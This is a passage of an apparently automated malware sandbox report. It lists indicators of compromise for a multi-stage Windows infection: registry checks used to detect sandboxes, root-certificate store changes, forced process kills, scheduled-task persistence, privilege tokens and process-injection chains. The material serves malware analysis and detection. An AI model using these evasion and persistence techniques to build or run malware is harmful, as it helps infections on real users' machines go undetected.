\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 8bf3eae87e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3f44d4da90.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2dcd38c299.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 51798fd265.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3f44d4da90.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3f44d4da90.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1904 timeout.exe 4596 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 10 IoCs
pid Process 3560 taskkill.exe 3132 taskkill.exe 3024 taskkill.exe 1752 taskkill.exe 1568 taskkill.exe 1120 taskkill.exe 1560 taskkill.exe 2088 taskkill.exe 2388 taskkill.exe 1888 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 8 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Ta3ZyUR.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 9debe854f4.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 9debe854f4.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 9debe854f4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 d2YQIJa.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e d2YQIJa.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e d2YQIJa.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Ta3ZyUR.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2144 schtasks.exe 2664 schtasks.exe 2524 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2108 2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe 1648 skotes.exe 3044 oVpNTUm.exe 1248 3omTNLZ.exe 1248 3omTNLZ.exe 1248 3omTNLZ.exe 1248 3omTNLZ.exe 1248 3omTNLZ.exe 1780 powershell.exe 3044 oVpNTUm.exe 688 powershell.exe 1780 powershell.exe 1780 powershell.exe 2160 wxlfj.exe 2784 TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE 2380 powershell.exe 2164 d2YQIJa.exe 1532 powershell.exe 2164 d2YQIJa.exe 2164 d2YQIJa.exe 2164 d2YQIJa.exe 2164 d2YQIJa.exe 2096 Ta3ZyUR.exe 2096 Ta3ZyUR.exe 2096 Ta3ZyUR.exe 2096 Ta3ZyUR.exe 2224 2f051bfec5.exe 2784 TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE 1708 powershell.exe 2784 TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE 1708 powershell.exe 1708 powershell.exe 2716 483d2fa8a0d53818306efeb32d3.exe 2764 892cde147c.exe 1972 51798fd265.exe 1972 51798fd265.exe 1972 51798fd265.exe 1972 51798fd265.exe 1972 51798fd265.exe 1620 2dcd38c299.exe 2296 3f44d4da90.exe 2296 3f44d4da90.exe 2420 90e0ad4bc6.exe 2420 90e0ad4bc6.exe 2420 90e0ad4bc6.exe 2420 90e0ad4bc6.exe 2420 90e0ad4bc6.exe 2380 257dc22f39.exe 1620 2dcd38c299.exe 1620 2dcd38c299.exe 2100 f63e940856.exe 1728 powershell.exe 2100 f63e940856.exe 2100 f63e940856.exe 1728 powershell.exe 1728 powershell.exe 1728 powershell.exe 3580 TempHWAXXYDHWXWEVPXVSGGRRCMVPHW93DYD.EXE 3580 TempHWAXXYDHWXWEVPXVSGGRRCMVPHW93DYD.EXE 4048 0912c4b7df.exe 4048 0912c4b7df.exe 4048 0912c4b7df.exe 4028 monthdragon.exe 4028 monthdragon.exe -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeDebugPrivilege 1780 powershell.exe Token: SeDebugPrivilege 688 powershell.exe Token: SeDebugPrivilege 2380 powershell.exe Token: SeDebugPrivilege 1532 powershell.exe Token: SeDebugPrivilege 2784 TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE Token: SeDebugPrivilege 1708 powershell.exe Token: SeDebugPrivilege 1620 2dcd38c299.exe Token: SeDebugPrivilege 2088 taskkill.exe Token: SeDebugPrivilege 1568 taskkill.exe Token: SeDebugPrivilege 1120 taskkill.exe Token: SeDebugPrivilege 2388 taskkill.exe Token: SeDebugPrivilege 1560 taskkill.exe Token: SeDebugPrivilege 1728 powershell.exe Token: SeDebugPrivilege 2696 firefox.exe Token: SeDebugPrivilege 2696 firefox.exe Token: SeDebugPrivilege 3560 taskkill.exe Token: SeDebugPrivilege 3132 taskkill.exe Token: SeDebugPrivilege 3024 taskkill.exe Token: SeDebugPrivilege 1888 taskkill.exe Token: SeDebugPrivilege 1752 taskkill.exe Token: SeDebugPrivilege 3112 powershell.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeDebugPrivilege 2292 firefox.exe Token: SeDebugPrivilege 2292 firefox.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeShutdownPrivilege 1868 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2108 2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe 1480 257584c93d.exe 1480 257584c93d.exe 1480 257584c93d.exe 1916 amnew.exe 2100 f63e940856.exe 2100 f63e940856.exe 2100 f63e940856.exe 2100 f63e940856.exe 2100 f63e940856.exe 2100 f63e940856.exe 2100 f63e940856.exe 2100 f63e940856.exe 2100 f63e940856.exe 2540 636ca944cf.exe 2540 636ca944cf.exe 2540 636ca944cf.exe 2100 f63e940856.exe 2100 f63e940856.exe 2696 firefox.exe 2696 firefox.exe 2696 firefox.exe 2696 firefox.exe 2100 f63e940856.exe 2100 f63e940856.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 2292 firefox.exe 2292 firefox.exe 2292 firefox.exe 2292 firefox.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe -
Suspicious use of SendNotifyMessage 36 IoCs
pid Process 1480 257584c93d.exe 1480 257584c93d.exe 1480 257584c93d.exe 2100 f63e940856.exe 2100 f63e940856.exe 2100 f63e940856.exe 2100 f63e940856.exe 2100 f63e940856.exe 2100 f63e940856.exe 2100 f63e940856.exe 2100 f63e940856.exe 2100 f63e940856.exe 2540 636ca944cf.exe 2540 636ca944cf.exe 2540 636ca944cf.exe 2100 f63e940856.exe 2100 f63e940856.exe 2696 firefox.exe 2696 firefox.exe 2696 firefox.exe 2100 f63e940856.exe 2100 f63e940856.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 3260 8bf3eae87e.exe 2292 firefox.exe 2292 firefox.exe 2292 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2108 wrote to memory of 1648 2108 2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe 30 PID 2108 wrote to memory of 1648 2108 2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe 30 PID 2108 wrote to memory of 1648 2108 2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe 30 PID 2108 wrote to memory of 1648 2108 2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe 30 PID 1648 wrote to memory of 3044 1648 skotes.exe 32 PID 1648 wrote to memory of 3044 1648 skotes.exe 32 PID 1648 wrote to memory of 3044 1648 skotes.exe 32 PID 1648 wrote to memory of 3044 1648 skotes.exe 32 PID 1648 wrote to memory of 1248 1648 skotes.exe 33 PID 1648 wrote to memory of 1248 1648 skotes.exe 33 PID 1648 wrote to memory of 1248 1648 skotes.exe 33 PID 1648 wrote to memory of 1248 1648 skotes.exe 33 PID 1648 wrote to memory of 1480 1648 skotes.exe 35 PID 1648 wrote to memory of 1480 1648 skotes.exe 35 PID 1648 wrote to memory of 1480 1648 skotes.exe 35 PID 1648 wrote to memory of 1480 1648 skotes.exe 35 PID 1480 wrote to memory of 1532 1480 257584c93d.exe 36 PID 1480 wrote to memory of 1532 1480 257584c93d.exe 36 PID 1480 wrote to memory of 1532 1480 257584c93d.exe 36 PID 1480 wrote to memory of 1532 1480 257584c93d.exe 36 PID 1480 wrote to memory of 1196 1480 257584c93d.exe 37 PID 1480 wrote to memory of 1196 1480 257584c93d.exe 37 PID 1480 wrote to memory of 1196 1480 257584c93d.exe 37 PID 1480 wrote to memory of 1196 1480 257584c93d.exe 37 PID 1532 wrote to memory of 2144 1532 cmd.exe 39 PID 1532 wrote to memory of 2144 1532 cmd.exe 39 PID 1532 wrote to memory of 2144 1532 cmd.exe 39 PID 1532 wrote to memory of 2144 1532 cmd.exe 39 PID 1196 wrote to memory of 1780 1196 mshta.exe 40 PID 1196 wrote to memory of 1780 1196 mshta.exe 40 PID 1196 wrote to memory of 1780 1196 mshta.exe 40 PID 1196 wrote to memory of 1780 1196 mshta.exe 40 PID 1648 wrote to memory of 2540 1648 skotes.exe 42 PID 1648 wrote to memory of 2540 1648 skotes.exe 42 PID 1648 wrote to memory of 2540 1648 skotes.exe 42 PID 1648 wrote to memory of 2540 1648 skotes.exe 42 PID 2540 wrote to memory of 2004 2540 cmd.exe 44 PID 2540 wrote to memory of 2004 2540 cmd.exe 44 PID 2540 wrote to memory of 2004 2540 cmd.exe 44 PID 2540 wrote to memory of 2004 2540 cmd.exe 44 PID 2004 wrote to memory of 1904 2004 cmd.exe 46 PID 2004 wrote to memory of 1904 2004 cmd.exe 46 PID 2004 wrote to memory of 1904 2004 cmd.exe 46 PID 2004 wrote to memory of 1904 2004 cmd.exe 46 PID 2004 wrote to memory of 2584 2004 cmd.exe 47 PID 2004 wrote to memory of 2584 2004 cmd.exe 47 PID 2004 wrote to memory of 2584 2004 cmd.exe 47 PID 2004 wrote to memory of 2584 2004 cmd.exe 47 PID 2584 wrote to memory of 688 2584 cmd.exe 48 PID 2584 wrote to 